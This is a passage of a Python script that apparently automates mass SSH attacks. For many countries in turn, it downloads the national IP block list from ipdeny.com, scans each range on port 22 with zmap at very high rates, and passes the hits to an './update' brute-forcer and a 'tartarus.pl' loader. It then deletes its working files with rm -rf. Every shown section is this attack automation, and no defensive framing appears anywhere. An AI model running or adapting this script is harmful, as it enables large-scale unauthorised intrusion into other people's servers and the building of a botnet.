vex('zmap -p22 -w mo.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf mo.zone vuln.txt mfu.txt')
vex('zmap -p22 -w mp.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf mp.zone vuln.txt mfu.txt')
vex('zmap -p22 -w mq.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf mq.zone vuln.txt mfu.txt')
vex('zmap -p22 -w mr.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf mr.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ms.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ms.zone vuln.txt mfu.txt')
vex('zmap -p22 -w mt.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf mt.zone vuln.txt mfu.txt')
vex('zmap -p22 -w mt.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf mt.zone vuln.txt mfu.txt')
vex('zmap -p22 -w mv.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf mv.zone vuln.txt mfu.txt')
vex('zmap -p22 -w mw.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf mw.zone vuln.txt mfu.txt')
vex('zmap -p22 -w mx.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf mx.zone vuln.txt mfu.txt')
vex('zmap -p22 -w my.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf my.zone vuln.txt mfu.txt')
vex('zmap -p22 -w mz.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf mz.zone vuln.txt mfu.txt')
#########################################
#  _   _      ______                
# | \ | |    |___  /                
# |  \| |______ / / ___  _ __   ___ 
# | . ` |______/ / / _ \| '_ \ / _ \
# | |\  |     / /_| (_) | | | |  __/
# |_| \_|    /_____\___/|_| |_|\___|
#########################################
print(""+ white +"Downloading "+ red +"N-Zone "+ white +"Collection..")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"na.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/na.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"nc.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/nc.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ne.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ne.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"nf.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/nf.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ng.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ng.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ni.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ni.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"nl.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/nl.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"no.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/no.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"np.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/np.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"nr.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/nr.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"nu.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/nu.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"nz.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/nz.zone')
print(""+ red +"Finished"+ white +"!")
time.sleep(2)
vex('clear')
vex('zmap -p22 -w na.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf na.zone vuln.txt mfu.txt')
vex('zmap -p22 -w nc.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf nc.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ne.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ne.zone vuln.txt mfu.txt')
vex('zmap -p22 -w nf.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf nf.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ng.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ng.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ni.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ni.zone vuln.txt mfu.txt')
vex('zmap -p22 -w nl.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf nl.zone vuln.txt mfu.txt')
vex('zmap -p22 -w no.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf no.zone vuln.txt mfu.txt')
vex('zmap -p22 -w np.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf np.zone vuln.txt mfu.txt')
vex('zmap -p22 -w nr.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf nr.zone vuln.txt mfu.txt')
vex('zmap -p22 -w nu.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf nu.zone vuln.txt mfu.txt')
vex('zmap -p22 -w nz.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf nz.zone vuln.txt mfu.txt')
#########################################
#   ____       ______                
#  / __ \     |___  /                
# | |  | |______ / / ___  _ __   ___ 
# | |  | |______/ / / _ \| '_ \ / _ \
# | |__| |     / /_| (_) | | | |  __/
#  \____/     /_____\___/|_| |_|\___|
#########################################


print(""+ white +"Downloading "+ red +"O-Zone "+ white +"Collection..")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"om.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/om.zone')
print(""+ red +"Finished"+ white +"!")
time.sleep(2)
vex('clear')
vex('zmap -p22 -w om.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf om.zone vuln.txt mfu.txt')

#########################################
#  _____      ______                
# |  __ \    |___  /                
# | |__) |_____ / / ___  _ __   ___ 
# |  ___/______/ / / _ \| '_ \ / _ \
# | |         / /_| (_) | | | |  __/
# |_|        /_____\___/|_| |_|\___|
#########################################


print(""+ white +"Downloading "+ red +"P-Zone "+ white +"Collection..")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"pa.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/pa.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"pe.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/pe.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"pf.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/pf.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"pg.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/pg.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ph.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ph.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"pk.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/pk.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"pl.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/pl.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"pm.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/pm.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"pr.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/pr.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ps.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ps.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"pt.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/pt.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"pw.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/pw.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"py.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/py.zone')
print(""+ red +"Finished"+ white +"!")
time.sleep(2)
vex('clear')
vex('zmap -p22 -w pa.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf pa.zone vuln.txt mfu.txt')
vex('zmap -p22 -w pe.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf pe.zone vuln.txt mfu.txt')
vex('zmap -p22 -w pf.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf pf.zone vuln.txt mfu.txt')
vex('zmap -p22 -w pg.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf pg.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ph.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ph.zone vuln.txt mfu.txt')
vex('zmap -p22 -w pk.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf pk.zone vuln.txt mfu.txt')
vex('zmap -p22 -w pl.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf pl.zone vuln.txt mfu.txt')
vex('zmap -p22 -w pm.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf pm.zone vuln.txt mfu.txt')
vex('zmap -p22 -w pr.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf pr.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ps.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ps.zone vuln.txt mfu.txt')
vex('zmap -p22 -w pt.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf pt.zone vuln.txt mfu.txt')
vex('zmap -p22 -w pw.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf pw.zone vuln.txt mfu.txt')
vex('zmap -p22 -w py.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf py.zone vuln.txt mfu.txt')
#########################################
#   ____       ______                
#  / __ \     |___  /                
# | |  | |______ / / ___  _ __   ___ 
# | |  | |______/ / / _ \| '_ \ / _ \
# | |__| |     / /_| (_) | | | |  __/
#  \___\_\    /_____\___/|_| |_|\___|
#########################################
print(""+ white +"Downloading "+ red +"Q-Zone "+ white +"Collection..")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"qa.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/qa.zone')
print(""+ red +"Finished"+ white +"!")
time.sleep(2)
vex('clear')
vex('zmap -p22 -w qa.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf qa.zone vuln.txt mfu.txt')

#########################################
#  _____      ______                
# |  __ \    |___  /                
# | |__) |_____ / / ___  _ __   ___ 
# |  _  /______/ / / _ \| '_ \ / _ \
# | | \ \     / /_| (_) | | | |  __/
# |_|  \_\   /_____\___/|_| |_|\___|
#########################################
print(""+ white +"Downloading "+ red +"R-Zone "+ white +"Collection..")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"re.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/re.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ro.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ro.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"rs.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/rs.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ru.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ru.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"rw.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/rw.zone')
print(""+ red +"Finished"+ white +"!")
time.sleep(2)
vex('clear')
vex('zmap -p22 -w re.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf re.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ro.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ro.zone vuln.txt mfu.txt')
vex('zmap -p22 -w rs.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf rs.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ru.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ru.zone vuln.txt mfu.txt')
vex('zmap -p22 -w rw.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf rw.zone vuln.txt mfu.txt')
#########################################
#   _____     ______                
#  / ____|   |___  /                
# | (___ ______ / / ___  _ __   ___ 
#  \___ \______/ / / _ \| '_ \ / _ \
#  ____) |    / /_| (_) | | | |  __/
# |_____/    /_____\___/|_| |_|\___|
#########################################


print(""+ white +"Downloading "+ red +"S-Zone "+ white +"Collection..")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"sa.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/sa.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"sb.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/sb.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"sc.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/sc.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"sd.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/sd.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"se.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/se.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"sg.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/sg.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"si.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/si.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"sk.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/sk.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"sl.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/sl.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"sm.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/sm.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"sn.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/sn.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"so.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/so.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"sr.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/sr.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ss.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ss.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"st.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/st.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"sv.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/sv.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"sx.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/sx.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"sy.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/sy.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"sz.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/sz.zone')
print(""+ red +"Finished"+ white +"!")
time.sleep(2)
vex('clear')

vex('zmap -p22 -w sa.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf sa.zone vuln.txt mfu.txt')
vex('zmap -p22 -w sb.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf sb.zone vuln.txt mfu.txt')
vex('zmap -p22 -w sc.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf sc.zone vuln.txt mfu.txt')
vex('zmap -p22 -w sd.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf sd.zone vuln.txt mfu.txt')
vex('zmap -p22 -w se.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf se.zone vuln.txt mfu.txt')
vex('zmap -p22 -w sg.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf sg.zone vuln.txt mfu.txt')
vex('zmap -p22 -w si.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf si.zone vuln.txt mfu.txt')
vex('zmap -p22 -w sk.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf sk.zone vuln.txt mfu.txt')
vex('zmap -p22 -w sl.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf sl.zone vuln.txt mfu.txt')
vex('zmap -p22 -w sm.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf sm.zone vuln.txt mfu.txt')
vex('zmap -p22 -w sn.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf sn.zone vuln.txt mfu.txt')
vex('zmap -p22 -w so.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf so.zone vuln.txt mfu.txt')
vex('zmap -p22 -w sr.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf sr.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ss.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ss.zone vuln.txt mfu.txt')
vex('zmap -p22 -w st.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf st.zone vuln.txt mfu.txt')
vex('zmap -p22 -w sv.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf sv.zone vuln.txt mfu.txt')
vex('zmap -p22 -w sx.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf sx.zone vuln.txt mfu.txt')
vex('zmap -p22 -w sy.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf sy.zone vuln.txt mfu.txt')
vex('zmap -p22 -w sz.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf sz.zone vuln.txt mfu.txt')

#########################################
#  _______   ______                
# |__   __| |___  /                
#    | |______ / / ___  _ __   ___ 
#    | |______/ / / _ \| '_ \ / _ \
#    | |     / /_| (_) | | | |  __/
#    |_|    /_____\___/|_| |_|\___|
#########################################


print(""+ white +"Downloading "+ red +"T-Zone "+ white +"Collection..")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"tc.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/tc.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"td.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/td.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"tg.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/tg.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"th.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/th.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"tj.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/tj.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"tk.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/tk.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"tl.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/tl.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"tm.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/tm.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"tn.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/tn.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"to.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/to.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"tr.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/tr.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"tt.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/tt.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"tv.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/tv.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"tw.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/tw.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"tz.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/tz.zone')
print(""+ red +"Finished"+ white +"!")
time.sleep(2)
vex('clear')
vex('zmap -p22 -w tc.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf tc.zone vuln.txt mfu.txt')
vex('zmap -p22 -w td.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf td.zone vuln.txt mfu.txt')
vex('zmap -p22 -w tg.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf tg.zone vuln.txt mfu.txt')
vex('zmap -p22 -w th.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf th.zone vuln.txt mfu.txt')
vex('zmap -p22 -w tj.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf tj.zone vuln.txt mfu.txt')
vex('zmap -p22 -w tk.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf tk.zone vuln.txt mfu.txt')
vex('zmap -p22 -w tl.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf tl.zone vuln.txt mfu.txt')
vex('zmap -p22 -w tm.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf tm.zone vuln.txt mfu.txt')
vex('zmap -p22 -w tn.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf tn.zone vuln.txt mfu.txt')
vex('zmap -p22 -w to.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf to.zone vuln.txt mfu.txt')
vex('zmap -p22 -w tr.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf tr.zone vuln.txt mfu.txt')
vex('zmap -p22 -w tt.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf tt.zone vuln.txt mfu.txt')
vex('zmap -p22 -w tv.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf tv.zone vuln.txt mfu.txt')
vex('zmap -p22 -w tw.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf tw.zone vuln.txt mfu.txt')
vex('zmap -p22 -w tz.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf tz.zone vuln.txt mfu.txt')
#########################################
#  _    _      ______                
# | |  | |    |___  /                
# | |  | |______ / / ___  _ __   ___ 
# | |  | |______/ / / _ \| '_ \ / _ \
# | |__| |     / /_| (_) | | | |  __/
#  \____/     /_____\___/|_| |_|\___|
#########################################


print(""+ white +"Downloading "+ red +"U-Zone "+ white +"Collection..")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ua.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ua.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ug.zone"+ red +"]"+ white +"")
